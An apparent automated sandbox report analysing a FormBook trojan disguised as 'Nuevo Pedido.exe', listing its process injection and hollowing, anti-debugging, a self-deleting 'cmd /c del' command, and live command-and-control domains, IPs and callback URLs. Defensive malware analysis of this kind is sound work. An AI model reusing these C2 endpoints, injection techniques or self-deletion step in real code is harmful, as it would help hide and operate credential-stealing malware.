            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04793A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04804257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00409B40 LdrLoadDll,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exeDomain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80
            Source: C:\Windows\explorer.exeDomain query: www.tremblock.com
            Source: C:\Windows\explorer.exeDomain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exeDomain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
            Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exeDomain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.232.250.147 80
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.53 80
            Source: C:\Windows\explorer.exeDomain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: A50000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread register set: target process: 3472
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3472
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.290583632.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.285226042.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.272484654.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.251544899.00000000089FF000.00000004.00000001.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000005.00000000.279791809.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.242187567.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.258666417.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Users\user\Desktop\Nuevo Pedido.exe VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528617 Sample: Nuevo Pedido.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 36 www.trenddoffical.com 2->36 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 11 Nuevo Pedido.exe 3 2->11         started        signatures3 process4 file5 28 C:\Users\user\...28uevo Pedido.exe.log, ASCII 11->28 dropped 14 Nuevo Pedido.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 thejohnmatt.com 192.232.250.147, 49838, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.tremblock.com 185.53.178.53, 49784, 80 TEAMINTERNET-ASDE Germany 17->32 34 8 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 cscript.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Nuevo Pedido.exe33%VirustotalBrowse
            Nuevo Pedido.exe33%ReversingLabsWin32.Trojan.FormBook

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.0.Nuevo Pedido.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.2.Nuevo Pedido.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.0.Nuevo Pedido.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.0.Nuevo Pedido.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            thejohnmatt.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.rcepjobs.com0%Avira URL Cloudsafe
            www.spoiledzone.com/udeh/0%Avira URL Cloudsafe
            http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe
            http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.rcepjobs.com
            		3.64.163.50
            		truetrue
              		unknown
              www.tremblock.com
              		185.53.178.53
              		truetrue
                		unknown
                thejohnmatt.com
                		192.232.250.147
                		truetrueunknown
                www.downingmunroe.online
                		209.17.116.163
                		truetrue
                  		unknown
                  www.onlinedatingthaiweb.com
                  		185.53.179.91
                  		truetrue
                    		unknown
                    www.sosibibyslot.website
                    		unknown
                    		unknowntrue
                      		unknown
                      www.securebankofamericalog.site
                      		unknown
                      		unknowntrue
                        		unknown
                        www.thejohnmatt.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.trenddoffical.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.blueprintroslyn.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.spoiledzone.com/udeh/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rNtrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.rcepjobs.comcscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                185.53.179.91
                                		www.onlinedatingthaiweb.comGermany
                                		61969TEAMINTERNET-ASDEtrue
                                192.232.250.147
                                		thejohnmatt.comUnited States
                                		46606UNIFIEDLAYER-AS-1UStrue
                                185.53.178.53
                                		www.tremblock.comGermany
                                		61969TEAMINTERNET-ASDEtrue
                                3.64.163.50
                                		www.rcepjobs.comUnited States
                                		16509AMAZON-02UStrue
                                209.17.116.163
                                		www.downingmunroe.onlineUnited States
                                		55002DEFENSE-NETUStrue

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:528617
                                Start date:25.11.2021
                                Start time:15:08:16
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 48s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Nuevo Pedido.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/1@11/6
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 18.3% (good quality ratio 16.3%)
                                • Quality average: 73%
                                • Quality standard deviation: 32.2%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:09:08API Interceptor22x Sleep call for process: Nuevo Pedido.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                185.53.178.53Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                • www.reversefi.com/qd8i/?xPWH_=LVz4vpXpDf7DLZ&Qp=rcvYkRDnIzNpt4g8o0sJvmmwZ0UwnLmi+6Qa0PCW1CpRdD+roYdanzHZdYMyqKoDIjqk
                                PO210119.exe.exeGet hashmaliciousBrowse
                                • www.tickets2usa.com/2kf/?xPGHVhT0=smpWEJEJTDw4K5WH6R9AAVYOZ8RNDQzAgTDDGy5VZzc1L6k/PvhBcdPX0Lmk5MLprvOJ&9r4P2=J484
                                http://office.esGet hashmaliciousBrowse
                                • office.es/favicon.ico
                                3.64.163.50Zr26f1rL6r.exeGet hashmaliciousBrowse
                                • www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z
                                xDG1WDcI0o.exeGet hashmaliciousBrowse
                                • www.warriorsouls.com/imnt/?w4=173jVSvDSoGUE2AW1ivoK5ykCyKPADg/LonPGNHNCQX2BYegbwJ7vTJYHkxtjawzsEfN&nHNxLR=Q48l
                                Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                • www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP
                                Xl1gbEIo0b.exeGet hashmaliciousBrowse
                                • www.teachermeta.com/btn2/?nRk=QvINNIMzsRYf/0qmivF6Dmovk+WpXAaZUAI4egrxWGuGQnhzgyC+G4dLS9x+/CyjCjh9&sFN0Yx=JL0hlxBhSB
                                Rev_NN doccument.docGet hashmaliciousBrowse
                                • www.brettneoheroes.com/e6b3/
                                202111161629639000582.exeGet hashmaliciousBrowse
                                • www.sketchnfts.com/wkgp/?4h5=jdmv8BZZ/B46r0we2YWB0KZ3uGSoSKuz6a4pN1QKcZ2F8xRxcAMtTOc/gzvsbCezLg9G&2dX=P6APITtHDX2tmpK
                                Ez6r9fZIXc.exeGet hashmaliciousBrowse
                                • www.battlegroundxr.com/ad6n/?G8a0vHm=ZcTQfm3E3Bis9O+U1J+3C+jUHMxN8jyTuxkjib6Q0pkS+Pn4CLfVing+78WMbf+swImY&6lrHq=5jktfN6hH6
